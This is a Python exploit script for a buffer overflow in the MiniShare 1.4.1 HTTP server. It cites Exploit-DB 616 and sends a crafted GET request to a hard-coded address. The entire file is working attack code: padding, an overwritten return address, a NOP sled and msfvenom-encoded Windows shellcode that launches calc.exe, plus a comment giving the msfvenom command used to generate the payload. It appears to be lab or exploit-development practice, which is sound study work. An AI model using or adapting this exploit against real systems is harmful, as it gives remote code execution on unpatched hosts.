minishare-exploit.py

#!/usr/bin/env python3
# https://www.exploit-db.com/exploits/616
# https://www.exploit-db.com/apps/0ffe5385147edd1f9e7b460c6d7cb0a6-minishare-1.4.1.zip
# bar_chars = b"\x00\x0d"
# shellcode = msfvenom -p windows/exec -a x86 --platform windows -b '\x00\x0d' -f python -e x86/shikata_ga_nai CMD=calc.exe EXITFUNC=thread
# EIP tested on Win 7 Home x64 fully patched

import socket
import struct

RHOST = "172.16.2.3"
RPORT = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))

buf_start = ""
buf_start += "GET "
buf_start += "A"*1787

eip = b""
eip += b"\x0b\xcc\x25\x77"

buf =  b""
buf = b"\x90"*50
buf += b"\xda\xcf\xd9\x74\x24\xf4\xba\xaa\x02\xa9\x3b\x5e\x2b"
buf += b"\xc9\xb1\x31\x31\x56\x18\x83\xc6\x04\x03\x56\xbe\xe0"
buf += b"\x5c\xc7\x56\x66\x9e\x38\xa6\x07\x16\xdd\x97\x07\x4c"
buf += b"\x95\x87\xb7\x06\xfb\x2b\x33\x4a\xe8\xb8\x31\x43\x1f"
buf += b"\x09\xff\xb5\x2e\x8a\xac\x86\x31\x08\xaf\xda\x91\x31"
buf += b"\x60\x2f\xd3\x76\x9d\xc2\x81\x2f\xe9\x71\x36\x44\xa7"
buf += b"\x49\xbd\x16\x29\xca\x22\xee\x48\xfb\xf4\x65\x13\xdb"
buf += b"\xf7\xaa\x2f\x52\xe0\xaf\x0a\x2c\x9b\x1b\xe0\xaf\x4d"
buf += b"\x52\x09\x03\xb0\x5b\xf8\x5d\xf4\x5b\xe3\x2b\x0c\x98"
buf += b"\x9e\x2b\xcb\xe3\x44\xb9\xc8\x43\x0e\x19\x35\x72\xc3"
buf += b"\xfc\xbe\x78\xa8\x8b\x99\x9c\x2f\x5f\x92\x98\xa4\x5e"
buf += b"\x75\x29\xfe\x44\x51\x72\xa4\xe5\xc0\xde\x0b\x19\x12"
buf += b"\x81\xf4\xbf\x58\x2f\xe0\xcd\x02\x25\xf7\x40\x39\x0b"
buf += b"\xf7\x5a\x42\x3b\x90\x6b\xc9\xd4\xe7\x73\x18\x91\x08"
buf += b"\x96\x89\xef\xa0\x0f\x58\x52\xad\xaf\xb6\x90\xc8\x33"
buf += b"\x33\x68\x2f\x2b\x36\x6d\x6b\xeb\xaa\x1f\xe4\x9e\xcc"
buf += b"\x8c\x05\x8b\xae\x53\x96\x57\x1f\xf6\x1e\xfd\x5f"

buf_end = ""
buf_end += "C"*20
buf_end += " HTTP/1.1"
buf_end += "\r\n\r\n"

buf_full = buf_start.encode() + eip + buf + buf_end.encode()

s.send(buf_full)